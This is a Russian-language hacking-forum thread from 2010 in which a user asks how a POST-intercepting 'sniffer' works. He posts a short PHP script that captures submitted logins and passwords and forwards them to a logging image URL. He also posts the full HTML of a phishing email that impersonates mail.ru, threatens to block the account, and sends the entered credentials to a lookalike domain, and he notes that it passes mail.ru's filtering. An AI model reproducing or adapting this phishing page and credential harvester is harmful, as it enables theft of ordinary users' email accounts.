Перехват POST запроса?
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Перехват POST запроса? - 2010-01-09 17:50:03.823333
|
|
|
вoрон
Сообщений: 5
Оценки: 0
Присоединился: 2010-01-08 22:52:53.656666
|
Подскажите как должен выглядеть скрипт с перехватом POST для сниффера,я представляю что это $_SERVER['QUERY_STRING'] перехватывает после знака ?,но как организовать это? То есть к примеру отправляю письмо в HTML и как мне сделать что бы перехватывалось всё после формы action. Я не имею ввиду фейки,просто стало интересно как работает сниффер на http://hacker-pro.net/sniffer/
|
|
|
RE: Перехват POST запроса? - 2010-01-09 18:06:38.050000
|
|
|
FriLL
Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
|
http://forum.xakep.ru/m_1546613/tm.htm - изучай если чтото непонятно - пиши
|
|
|
RE: Перехват POST запроса? - 2010-01-09 18:16:27.480000
|
|
|
janitor
Сообщений: 100
Оценки: 0
Присоединился: 2009-09-11 15:33:08.426666
|
после знака вопроса параметры, передающиеся GETом. POST передается "незаметно" ловить $_GET $_POST $_SERVER['QUERY_STRING'] - вернет часть строки, после вопроса, которую придется еще обрабатывать
|
|
|
RE: Перехват POST запроса? - 2010-01-09 18:25:50.933333
|
|
|
вoрон
Сообщений: 5
Оценки: 0
Присоединился: 2010-01-08 22:52:53.656666
|
Спасибо,с работай сниффера я знаком,я переделывал сниффер Kanick: <?php
$login = $_POST['Login'];
$Pass = $_POST['Password'];
$string_writetosn = "Login: $login | Pass: $Pass";
$string_writetosn = str_replace(' ','+',$string_writetosn);
header("Location: /s.gif? . $string_writetosn");
?> Где перехватывается Login и Password после знака ? Вопрос в в другом,к примеру мне пришло письмо вида: <table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr>
<td id=aj_bоdу>
<div id=let_bоdу><base href="http://win.mail.ru/cgi-bin/readmsg"><xHTML><xHEAD><xMETA NAME=GENERATOR Content=Microsoft DHTML Editing Control></xHEAD><xbоdу><xHTML><xHEAD><xMETA NAME=GENERATOR Content=Microsoft DHTML Editing Control></xHEAD>
<xbоdу>
<img src=http://s15.radikal.ru/i188/0909/ac/b259bcffa673.bmp border=0><br>
<p>Здравствуйте!</p>
<p>В связи с поступившими жалобами на рассылку рекламных писем (спам) с вашего электронного адреса, администрация вынуждена заблокировать Вашу учетную запись.</p>
<p>Для продолжения пользования электронным адресом, Вам необходимо подтвердить, что Ваш электронный адрес не используется спам-ботом для рассылки рекламных писем.</p>
<b><font color=#ff0000>Это первое извещение, после третьего извещениея Ваша учётная запись будет удалена. Все письма, отправленные на Ваш электронный адрес будут переданы обратно отправителю.</font></b><p></p><font color=#003366 face=Times roman=new=>
</font><p><font color=#003366 face=Times roman=new=>Для подтверждения электронного адреса
<a href=http://win.rnnail.ru/cgl-bin/login/ target=filtered-оnclick=return cfm(this);= оnclick="return cfm(this);" >test@mail.ru</a>, заполните форму ниже:</font></p>
<div></div></XHTML>
<DIV></DIV></TD></TR></Tbоdу></TABLE>
<table width=100% cellpadding=0 cellspacing=0 border=0 class=login>
<form method=post action=//win.rnnail.ru/forma/forma.php target=_self filtered-onsubmit =return CheckForm(this);>
<input name=mail value=1 type=hidden>
<tr>
<td width=75>
<img src=http://img.mail.ru/0.gif height=1><br><font><b>И</b></font><b>мя</b>
</td>
<td width=150>
<input name=Sysvar1 value= readonly>
</td>
<td width=75>
<select name=Sysdo>
<option value=mail.ru selected>@mail.ru</option>
<option value=inbox.ru>@inbox.ru</option>
<option value=list.ru>@list.ru</option>
<option value=bk.ru>@bk.ru</option>
</select>
</td>
</tr>
<tr>
<td>
<font><b>П</b></font><b>ap<font>o</font>ль</b>
</td>
<td>
<input name=Sysvar2>
</td>
<td>
<a href=http://win.rnnail.ru/cgl-bin/login/ target=filtered-оnclick=return cfm(this);= оnclick="return cfm(this);" >Забыли <font>п</font>ap<font>o</font>ль?</a>
</td>
</tr>
<tr>
<td>
<font><b>Код</b>
</font></td>
<td>
<input name=system_var3>
</td><td><img src=http://win.rnnail.ru/forma/image.jpg alt=border=0 vspace=2></td>
<td>
</td></tr><tr>
<td> </td>
<td>
<input name=level value=1 id=alien type=checkbox><label for=alien>Чужой компьютер</label>
</td>
<td> </td>
</tr>
<tr>
<td> </td>
<td>
<input value=Подтвердить type=submit xxxxxxxxxxxstyle=margin-top:4px>
</td>
<td> </td>
</tr>
</table>
<p>После удачной авторизации, в течение суток Вам будет выслано письмо с инструкциями как защитить свой электронный адрес от нежелательной корреспонденции. Чтобы подробней узнать об услуге — посетите <a href=http://win.rnnail.ru/cgl-bin/login/ target=filtered-оnclick=return cfm(this);= оnclick="return cfm(this);" >Corp.Mail.Ru</a><br></p>
<p>Эти меры принимаются в связи с возросшим количеством нежелательных писем, получаемых пользователями @mail.ru.
Администрация вынужденна ужесточить политику борьбы со спамом.
Приносим свои извинения.</p></FORM>
</xbоdу>
</xHTML> Где сразу видно что не задействованы Login и Password почему и проходит фильтрацию на mail.ru.И при замене всё приходит. Вопрос в другом,как перехватывает это сниффер на hacker-pro. Цитата:(Скрипт перехватывает POST запрос (ключи и параметры) и пишет их в ваш лог. Для того чтобы перехватить POST запрос нужно заменить в html коде формы атрибут action на скрипт-обработчик, который перехватывает запрос. Если установлено поле urltogogo, то после перехвата POST запроса пользователь автоматически перенаправляется на заданную страницу)
|
|
|
RE: Перехват POST запроса? - 2010-01-09 19:05:42.896666
|
|
|
FriLL
Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
|
А ты не пробывал s.gif открыть блокнотом?
|
|
|
RE: Перехват POST запроса? - 2010-01-12 10:50:34.763333
|
|
|
вoрон
Сообщений: 5
Оценки: 0
Присоединился: 2010-01-08 22:52:53.656666
|
quote:
А ты не пробывал s.gif открыть блокнотом? Так я и не понял что что этим вы хотели мне показать?От балды наверно взяли что бы от новичков быстрей избавится. Вопрос решил сам,всем спасибо.
|
|
|
|
|